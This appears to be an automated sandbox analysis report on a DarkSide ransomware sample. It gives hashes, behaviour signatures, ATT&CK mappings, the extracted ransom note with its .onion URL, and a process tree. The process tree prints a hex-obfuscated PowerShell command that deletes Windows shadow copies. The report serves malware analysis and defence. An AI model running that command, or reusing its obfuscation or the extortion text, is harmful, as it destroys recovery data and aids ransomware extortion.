Analysis

  • max time kernel
    118s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-en-20211014
  • submitted
    17-11-2021 16:09

General

  • Target

    5860f2415aa9a30c045099e3071f099313f653ae1806d6bcdb5f47d5da96c6d7.exe

  • Size

    256KB

  • MD5

    e5ca2d127e7300f28fbeb1e74d6a6858

  • SHA1

    d3495ac3b708caeceffab59949dbf8a9fa24ccef

  • SHA256

    5860f2415aa9a30c045099e3071f099313f653ae1806d6bcdb5f47d5da96c6d7

  • SHA512

    6a0ea0f30648fec076abbeec97ff3d4b55fb34d376611468e52d6b11b9aa022dfb95448c0ba21794911f8c5f6d9c14ea7d0c87ee673f8b438255942712f73838

Malware Config

Extracted

Path

C:\\README.e0659d9c.TXT

Family

darkside

Ransom Note
----------- [ Welcome to DarkSide ] -------------> What happend? ---------------------------------------------- Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. Follow our instructions below and you will recover all your data. What guarantees? ---------------------------------------------- We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. We guarantee to decrypt one file for free. Go to the site and contact us. How to get access on website? ---------------------------------------------- Using a TOR browser: 1) Download and install TOR browser from this site: https://torproject.org/ 2) Open our website: http://darksidfqzcuhtk2.onion/GM0CG8TNZ83ZPUD15TL76BLDCG0ST24TR6NXG1J2AVXSKF8KS4KFIIN2ON5GRWD4 When you open our website, put the following data in the input form: Key: lsJTyyTnzJlGQ1I6sfwV6oVcXaRynwN6mWphA7BKXEDIHJcDlhNNHsrxlkpggRChK2nQ7wP0sknJvl37lbqElTopkUywK3QnfJFmqDBSCmFISeWSudjgwxB4kKSp7h4VySHeu4LmDiZXTAh1dbZHWxTtZ0bA6PhCoDrbGkctY4rucITW4IdYUZJC8d2B7SFnr5EA7EoRkajrZW54brM5Kgwqsz67qzH6Hk0Vr3EDcnGzNjGQBapJczIWkgPtMCJdTkeemQ34XH7wawXu3eOGV3uJlBZNoSuaxtDHMGApS8EWsUXhafMW8WxFLAPLCo6pdm7MLcLsVDp9iBXU1sLv2KkGyUJbO0KOmom9f1JREuidviHRfsndEgMFBAjyq5v4VEIraiioAbtWM7eecYaXPVt3rolsBi8mtjxLOpFj73NPPitoIDxBNfHGzXxvRTXi06Pjx9pRnAtjIqoq5wovnHa8uBel8nq8yDJTk7NWdGdsv3yVwV2TmBin7OvFqHN9lweFNJyuziKCVGEtSaglUNudMmpFnNObGlhfh58jQsrQiQZ2d3AOFsi !!! DANGER !!! DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. !!! DANGER !!!
URLs

http://darksidfqzcuhtk2.onion/GM0CG8TNZ83ZPUD15TL76BLDCG0ST24TR6NXG1J2AVXSKF8KS4KFIIN2ON5GRWD4

Signatures

  • DarkSide

    Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.

  • Modifies extensions of user files 13 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Sets desktop wallpaper using registry 2 TTPs 2 IoCs
  • Modifies Control Panel 1 IoCs
  • Modifies registry class 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 24 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\5860f2415aa9a30c045099e3071f099313f653ae1806d6bcdb5f47d5da96c6d7.exe
    "C:\Users\Admin\AppData\Local\Temp\5860f2415aa9a30c045099e3071f099313f653ae1806d6bcdb5f47d5da96c6d7.exe"
    1⤵
    • Modifies extensions of user files
    • Sets desktop wallpaper using registry
    • Modifies Control Panel
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1360
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1656
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:1052

Network

MITRE ATT&CK Matrix ATT&CK v6

Defense Evasion

Modify Registry

1
T1112

Credential Access

Credentials in Files

1
T1081

Collection

Data from Local System

1
T1005

Impact

Defacement

1
T1491

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    MD5

    e1109cfb3b63e8242d63fcf292177f24

    SHA1

    182470d69a047ed646adac9320757d58b9566475

    SHA256

    4c8c819324494c14538ec0df9ef24e196d6d6d39e246af794fcf2867b6b93ae4

    SHA512

    ccb5ff8e586f9453c6f1e8e33a1a517bbe68a338a8853e393efac41ca72b54ac09e34c944f66674628794682fbae1b2716896054b636cdb8299e140e60f47af1

  • memory/1360-55-0x0000000000400000-0x000000000083B000-memory.dmp
    Filesize

    4.2MB

  • memory/1360-56-0x00000000002E8000-0x00000000002F3000-memory.dmp
    Filesize

    44KB

  • memory/1360-57-0x0000000074F61000-0x0000000074F63000-memory.dmp
    Filesize

    8KB

  • memory/1360-58-0x0000000000020000-0x0000000000030000-memory.dmp
    Filesize

    64KB

  • memory/1360-59-0x0000000000400000-0x000000000083B000-memory.dmp
    Filesize

    4.2MB

  • memory/1656-61-0x000007FEFB831000-0x000007FEFB833000-memory.dmp
    Filesize

    8KB

  • memory/1656-62-0x000007FEF2830000-0x000007FEF338D000-memory.dmp
    Filesize

    11.4MB

  • memory/1656-63-0x0000000002A10000-0x0000000002A12000-memory.dmp
    Filesize

    8KB

  • memory/1656-64-0x0000000002A12000-0x0000000002A14000-memory.dmp
    Filesize

    8KB

  • memory/1656-65-0x0000000002A14000-0x0000000002A17000-memory.dmp
    Filesize

    12KB

  • memory/1656-66-0x000000001B740000-0x000000001BA3F000-memory.dmp
    Filesize

    3.0MB

  • memory/1656-67-0x0000000002A1B000-0x0000000002A3A000-memory.dmp
    Filesize

    124KB

  • memory/1656-60-0x0000000000000000-mapping.dmp